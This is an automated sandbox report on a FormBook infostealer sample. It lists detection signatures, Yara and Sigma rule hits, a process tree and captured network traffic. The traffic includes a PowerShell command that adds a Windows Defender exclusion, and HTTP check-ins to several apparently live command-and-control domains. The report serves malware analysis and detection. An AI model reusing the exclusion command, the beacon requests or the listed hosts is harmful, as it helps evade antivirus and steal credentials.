Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO23100072.exe

Overview

General Information

Sample name:PO23100072.exe
Analysis ID:1517921
MD5:b2a43d44c753d573caeb9160cb1da4a2
SHA1:873200a52f2bfd05cf5b708d87f8179486464fab
SHA256:405f4016376e02c97d8509d2627c7bb3be0583f46aa5a1ea57d96252b759f1f9
Tags:exeFormbookuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Uncommon Userinit Child Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Userinit Child Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO23100072.exe (PID: 1788 cmdline: "C:\Users\user\Desktop\PO23100072.exe" MD5: B2A43D44C753D573CAEB9160CB1DA4A2)
    • powershell.exe (PID: 3456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1912 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • PO23100072.exe (PID: 3552 cmdline: "C:\Users\user\Desktop\PO23100072.exe" MD5: B2A43D44C753D573CAEB9160CB1DA4A2)
    • PO23100072.exe (PID: 6136 cmdline: "C:\Users\user\Desktop\PO23100072.exe" MD5: B2A43D44C753D573CAEB9160CB1DA4A2)
      • FrMKpuEiehQ.exe (PID: 6560 cmdline: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • userinit.exe (PID: 6840 cmdline: "C:\Windows\SysWOW64\userinit.exe" MD5: 24892AC6E39679E3BD3B0154DE97C53A)
          • FrMKpuEiehQ.exe (PID: 6192 cmdline: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5600 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2be20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2be20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.PO23100072.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.PO23100072.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2eff3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17082:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          5.2.PO23100072.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            5.2.PO23100072.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e1f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16282:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO23100072.exe", ParentImage: C:\Users\user\Desktop\PO23100072.exe, ParentProcessId: 1788, ParentProcessName: PO23100072.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe", ProcessId: 3456, ProcessName: powershell.exe
            Sigma detected: Uncommon Userinit Child Process
            Source: Process startedAuthor: Tom Ueltschi (@c_APT_ure), Tim Shelton: Data: Command: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" , CommandLine: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe, NewProcessName: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe, OriginalFileName: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe, ParentCommandLine: "C:\Windows\SysWOW64\userinit.exe", ParentImage: C:\Windows\SysWOW64\userinit.exe, ParentProcessId: 6840, ParentProcessName: userinit.exe, ProcessCommandLine: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" , ProcessId: 6192, ProcessName: FrMKpuEiehQ.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO23100072.exe", ParentImage: C:\Users\user\Desktop\PO23100072.exe, ParentProcessId: 1788, ParentProcessName: PO23100072.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe", ProcessId: 3456, ProcessName: powershell.exe
            Sigma detected: Suspicious Userinit Child Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Samir Bousseaden (idea): Data: Command: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" , CommandLine: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe, NewProcessName: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe, OriginalFileName: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe, ParentCommandLine: "C:\Windows\SysWOW64\userinit.exe", ParentImage: C:\Windows\SysWOW64\userinit.exe, ParentProcessId: 6840, ParentProcessName: userinit.exe, ProcessCommandLine: "C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe" , ProcessId: 6192, ProcessName: FrMKpuEiehQ.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO23100072.exe", ParentImage: C:\Users\user\Desktop\PO23100072.exe, ParentProcessId: 1788, ParentProcessName: PO23100072.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe", ProcessId: 3456, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T09:16:01.206157+020020507451Malware Command and Control Activity Detected192.168.2.849712188.114.96.380TCP
            2024-09-25T09:16:24.413193+020020507451Malware Command and Control Activity Detected192.168.2.849717199.59.243.22780TCP
            2024-09-25T09:16:37.932974+020020507451Malware Command and Control Activity Detected192.168.2.849722198.252.106.19180TCP
            2024-09-25T09:16:51.106407+020020507451Malware Command and Control Activity Detected192.168.2.8497273.33.130.19080TCP
            2024-09-25T09:17:04.515185+020020507451Malware Command and Control Activity Detected192.168.2.849731148.251.114.23380TCP
            2024-09-25T09:17:17.913750+020020507451Malware Command and Control Activity Detected192.168.2.849735209.74.95.2980TCP
            2024-09-25T09:17:31.111467+020020507451Malware Command and Control Activity Detected192.168.2.849739199.59.243.22780TCP
            2024-09-25T09:17:44.301084+020020507451Malware Command and Control Activity Detected192.168.2.8497433.33.130.19080TCP
            2024-09-25T09:18:05.939548+020020507451Malware Command and Control Activity Detected192.168.2.84974752.223.13.4180TCP
            2024-09-25T09:18:19.934267+020020507451Malware Command and Control Activity Detected192.168.2.84975138.47.232.14480TCP
            2024-09-25T09:18:33.704910+020020507451Malware Command and Control Activity Detected192.168.2.84975552.230.28.8680TCP
            2024-09-25T09:18:48.608515+020020507451Malware Command and Control Activity Detected192.168.2.849759133.130.35.9080TCP
            2024-09-25T09:19:02.055491+020020507451Malware Command and Control Activity Detected192.168.2.84976352.223.13.4180TCP
            2024-09-25T09:19:15.269086+020020507451Malware Command and Control Activity Detected192.168.2.84976784.32.84.3280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: PO23100072.exeReversingLabs: Detection: 52%
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.PO23100072.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.PO23100072.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3909668348.00000000054A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3906350104.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1665615488.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3906324817.0000000004410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: PO23100072.exeJoe Sandbox ML: detected
            Source: PO23100072.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: PO23100072.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FrMKpuEiehQ.exe, 00000007.00000002.3904795319.000000000012E000.00000002.00000001.01000000.0000000A.sdmp, FrMKpuEiehQ.exe, 0000000A.00000000.1730386848.000000000012E000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO23100072.exe, 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1666001487.0000000003559000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1660307921.00000000033A1000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: ZlbU.pdb source: PO23100072.exe
            Source: Binary string: wntdll.pdb source: PO23100072.exe, PO23100072.exe, 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, userinit.exe, 00000009.00000003.1666001487.0000000003559000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1660307921.00000000033A1000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: userinit.pdb source: PO23100072.exe, 00000005.00000002.1660702317.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, FrMKpuEiehQ.exe, 00000007.00000002.3905365390.00000000011E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ZlbU.pdbSHA256X{_ source: PO23100072.exe
            Source: Binary string: userinit.pdbGCTL source: PO23100072.exe, 00000005.00000002.1660702317.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, FrMKpuEiehQ.exe, 00000007.00000002.3905365390.00000000011E8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0301C290 FindFirstFileW,FindNextFileW,FindClose,9_2_0301C290
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 4x nop then xor eax, eax9_2_03009B50
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 4x nop then mov ebx, 00000004h9_2_03A504DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49731 -> 148.251.114.233:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49722 -> 198.252.106.191:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49735 -> 209.74.95.29:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49712 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49717 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49759 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49755 -> 52.230.28.86:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49739 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49751 -> 38.47.232.144:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49767 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49727 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49763 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49743 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49747 -> 52.223.13.41:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.suarahati20.xyz
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
            Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
            Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: HAWKHOSTCA HAWKHOSTCA
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ttiz/?Ux_TPFo=5F0OqyJMruXZK289rjd3t7SMD6PUxbvF7XqmY+a1kYOMou9z9S8lHT4vD/FoxHElV5ffXVI3IhvTCCTpyiSb8mZInZ+7lTNJSqYtQImnDDTI4Qo9BSGA+0x0XmeeIzyp/A==&FvypB=88kTDXb8k4dH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.cc101.proConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /x7gz/?FvypB=88kTDXb8k4dH&Ux_TPFo=S2ThdnPEL+ISgmTm3B4s3uJcp0I5cmCvGyTPO0ydqwinms1NMbmy4dx/n743DQh1PnHu901crX3LUgGJDJcuYCXFMsY6FgwTNpVrSCEqyTejsoYQywqmfZ73r7v5CbykcA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.popin.spaceConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /tuad/?Ux_TPFo=COR99YL4ij4WSzIn9uKNQTj+/nF71npMJ8PUbDDmK/MOrLSwhgHAUUFmM9ZFV75zOrifp59AeN3Qrz+fk81rYB1Esp+MUB3RCvU15TDIEUASO5KKoulUwcQsQXQ4LVDRNA==&FvypB=88kTDXb8k4dH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.suarahati20.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /u85y/?FvypB=88kTDXb8k4dH&Ux_TPFo=wB3ZcmNh1MmrIwfSzb/pYDfeTUzW6O1UjWNgVadWZuGYS/WrcxHhgLOrzo8qigeYzDjwJvcv1eEC2ecO3wCLRJj3wqTQMKM05jGtzaYfnBJ5M7wMOeAqnxHMoiYb58YbsA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.dhkatp.vipConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /30vc/?Ux_TPFo=koLtGNOu6/mtotP2N90Ew8ZnZ5AtrYolTy+nHYpgZByzVo0p/pJDl5mHD5S71z13e/5SfuBUTFBQZBIfTtXqOOjASHRAzkUFzB/tE7NVhPpefWhKcPM/9ZcforBBDyLF2Q==&FvypB=88kTDXb8k4dH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.eslameldaramlly.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /gfz9/?FvypB=88kTDXb8k4dH&Ux_TPFo=DECFPtkNR+L/pYonsxrHc+WCM/VSeiNdGHXC1uiZlfELiNg401X1ACIRXYvsaPq78G/yZTFuD+bUVczsz0zGAWWWu1tjgA/c8IlwGYN4NejsTIqQyiKVQyEjdjnk1Av5Dw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.pofgof.proConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8lrv/?Ux_TPFo=j2pAwvMmmCrYZVhkds5ZvCZgOyouEeoq6hu2s2TUPhbYOoXX99buM+wwxSBgfXcmzEpqTCVAFMCZQnQtCVeL0dRVYSRjVdr/CgjqnWXTEiabUyUwGfk/MavwiZ9OFp3FkQ==&FvypB=88kTDXb8k4dH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.donante-de-ovulos.bizConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /i5ct/?FvypB=88kTDXb8k4dH&Ux_TPFo=Fa741987AWI4ml8JbykgJhLldRSV8MLMClq6YX0bCrkU+JaoPzqjDuf6Icle9aauT7Lw6ndlbIEz9rGtX42qIZx9WxYPHsy+7TyOZv7jOElLtueXdtfrjEJRdY8SctMF/g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.airtech365.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8q1d/?FvypB=88kTDXb8k4dH&Ux_TPFo=VzkWYQIqZCqyTa6CmCFXa3qoYwUD4s1ffSppgJrtVCF0SNpQYrHA+vb9V0hsreptvR0arq5HmwRiZDuL2EbfxnsbQ7dD9aDlq4oQdTdM2Qj2g6a0bpEWwWIB7x6JldQNMQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usHost: www.longfilsalphonse.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
